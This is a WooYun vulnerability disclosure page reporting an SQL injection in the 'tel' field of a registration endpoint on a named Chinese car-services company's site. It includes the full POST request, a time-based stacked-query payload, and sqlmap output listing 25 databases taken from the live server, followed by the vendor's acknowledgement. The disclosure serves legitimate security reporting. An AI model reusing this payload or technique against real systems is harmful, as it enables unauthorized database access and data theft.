车音网SQL注入五（25库 DBA权限） | wooyun-2015-0162002| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162002

漏洞标题：车音网SQL注入五（25库 DBA权限）

漏洞作者：天地不仁以万物为刍狗

提交时间：2015-12-17 11:00

修复时间：2016-02-01 10:51

公开时间：2016-02-01 10:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-17：细节已通知厂商并且等待厂商处理中
2015-12-22：厂商已经确认，细节仅向厂商公开
2016-01-01：细节向核心白帽子及相关领域专家公开
2016-01-11：细节向普通白帽子公开
2016-01-21：细节向实习白帽子公开
2016-02-01：细节向公众公开

简要描述：

呵呵哒

详细说明：

POST数据包：

POST /User/QuickRegisterAjax?time=1450266138499 HTTP/1.1
Host: carlife.vcyber.com
Content-Length: 130
Accept: text/plain, */*; q=0.01
Origin: http://carlife.vcyber.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 UBrowser/5.5.7852.9 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://carlife.vcyber.com/User/QuickRegister
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=0rtlegu3qgazlcr3nvn5lj45; Hm_lvt_0a20432bd2ea45c98b42bf5a4160022d=1450261937; Hm_lpvt_0a20432bd2ea45c98b42bf5a4160022d=1450266139
usercode=111111111111&userpwd=11111111&tel=13800138000&logincode=111111&loginpwd=123456&gender=%E7%94%B7&realName=admin&telnum=010

参数 tel 可注入

由于实在是跑的太慢了···数据库里的表什么的就不跑了···

漏洞证明：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: usercode=111111111111&userpwd=11111111&tel=13800138000';WAITFOR DEL
AY '0:0:5'--&logincode=111111&loginpwd=123456&gender=%E7%94%B7&realName=admin&te
lnum=010
---
[23:26:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:26:56] [INFO] fetching database names
[23:26:56] [INFO] fetching number of databases
[23:26:56] [INFO] resumed: 25
[23:26:56] [INFO] resuming partial value: A
[23:26:56] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[23:26:56] [WARNING] time-based comparison requires larger statistical model, pl
ease wait.............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[23:27:28] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[23:27:38] [INFO] adjusting time delay to 1 second due to good response times
pec
[23:27:59] [ERROR] invalid character detected. retrying..
[23:27:59] [WARNING] increasing time delay to 2 seconds
n.Music
[23:29:10] [ERROR] invalid character detected. retrying..
[23:29:10] [WARNING] increasing time delay to 3 seconds
[23:29:19] [ERROR] invalid character detected. retrying..
[23:29:19] [WARNING] increasing time delay to 4 seconds
DB
[23:29:44] [INFO] retrieved: Around
[23:31:46] [ERROR] invalid character detected. retrying..
[23:31:46] [WARNING] increasing time delay to 5 seconds
System
[23:34:04] [ERROR] invalid character detected. retrying..
[23:34:04] [WARNING] increasing time delay to 6 seconds
DB
[23:34:39] [INFO] retrieved: C
[23:35:14] [ERROR] invalid character detected. retrying..
[23:35:14] [WARNING] increasing time delay to 7 seconds
arStatus
[23:38:55] [INFO] retrieved: carvp_mo
[23:43:32] [ERROR] invalid character detected. retrying..
[23:43:32] [WARNING] increasing time delay to 8 seconds
b
[23:44:24] [ERROR] invalid character detected. retrying..
[23:44:24] [WARNING] increasing time delay to 9 seconds
ile
[23:46:10] [INFO] retrieved: CMS
[23:47:30] [INFO] retrieved: CMSDB
[23:49:38] [INFO] retrieved: ContentManagementSystem
[00:03:46] [INFO] retrieved: DBOnlin
[00:08:34] [ERROR] invalid character detected. retrying..
[00:08:34] [WARNING] increasing time delay to 10 seconds
e
[00:09:08] [INFO] retrieved: distrib
[00:14:26] [ERROR] invalid character detected. retrying..
[00:14:26] [WARNING] increasing time delay to 11 seconds
ution
[00:18:39] [INFO] retrieved: EX
[00:20:36] [ERROR] invalid character detected. retrying..
[00:20:36] [WARNING] increasing time delay to 12 seconds
TERNAL_CDR
[00:27:11] [INFO] retrieved: HBS
[00:29:31] [ERROR] invalid character detected. retrying..
[00:29:31] [WARNING] increasing time delay to 13 seconds
Contact
[00:35:36] [INFO] retrieved: InterFaceDB
[00:43:35] [INFO] retrieved: master
[00:48:34] [INFO] retrieved: Mobil
[00:53:34] [ERROR] invalid character detected. retrying..
[00:53:34] [WARNING] increasing time delay to 14 seconds
e
[00:55:03] [ERROR] invalid character detected. retrying..
[00:55:03] [WARNING] increasing time delay to 15 seconds
[00:55:51] [ERROR] invalid character detected. retrying..
[00:55:51] [WARNING] increasing time delay to 16 seconds
SoundConsole
[01:09:35] [INFO] retrieved: model
[01:15:22] [INFO] retrieved: msdb
[01:19:31] [INFO] retrieved: Pus
[01:23:55] [ERROR] invalid character detected. retrying..
[01:23:55] [WARNING] increasing time delay to 17 seconds
hMessage
[01:32:07] [INFO] retrieved: SpeechDB
[01:40:25] [INFO] retrieved: tempdb
[01:47:43] [INFO] retrieved: Transcode
[01:57:39] [INFO] retrieved: vCyber
[02:03:49] [INFO] retrieved: vJTCyber
[02:12:02] [INFO] retrieved: WebServiceLogDB
[02:27:15] [INFO] retrieved: www_carvp
[02:40:22] [ERROR] invalid character detected. retrying..
[02:40:22] [WARNING] increasing time delay to 18 seconds
_cn
[02:44:23] [INFO] retrieved: ZYKJDB
available databases [25]:
[*] [Apecn.MusicDB]
[*] AroundSystemDB
[*] CarStatus
[*] carvp_mobile
[*] CMS
[*] CMSDB
[*] ContentManagementSystem
[*] DBOnline
[*] distribution
[*] EXTERNAL_CDR
[*] HBSContact
[*] InterFaceDB
[*] master
[*] MobileSoundConsole
[*] model
[*] msdb
[*] PushMessage
[*] SpeechDB
[*] tempdb
[*] Transcode
[*] vCyber
[*] vJTCyber
[*] WebServiceLogDB
[*] www_carvp_cn
[*] ZYKJDB
[02:50:00] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\carlife.vcyber.com'
[*] shutting down at 02:50:00

修复方案：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-12-22 09:00

厂商回复：

收到，谢谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162002

漏洞标题：车音网SQL注入五（25库 DBA权限）

相关厂商：深圳市车音网科技有限公司

漏洞作者：天地不仁以万物为刍狗

提交时间：2015-12-17 11:00

修复时间：2016-02-01 10:51

公开时间：2016-02-01 10:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162002

漏洞标题：车音网SQL注入五（25库 DBA权限）

相关厂商：深圳市车音网科技有限公司

漏洞作者： 天地不仁 以万物为刍狗

提交时间：2015-12-17 11:00

修复时间：2016-02-01 10:51

公开时间：2016-02-01 10:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0162002"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：天地不仁以万物为刍狗

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云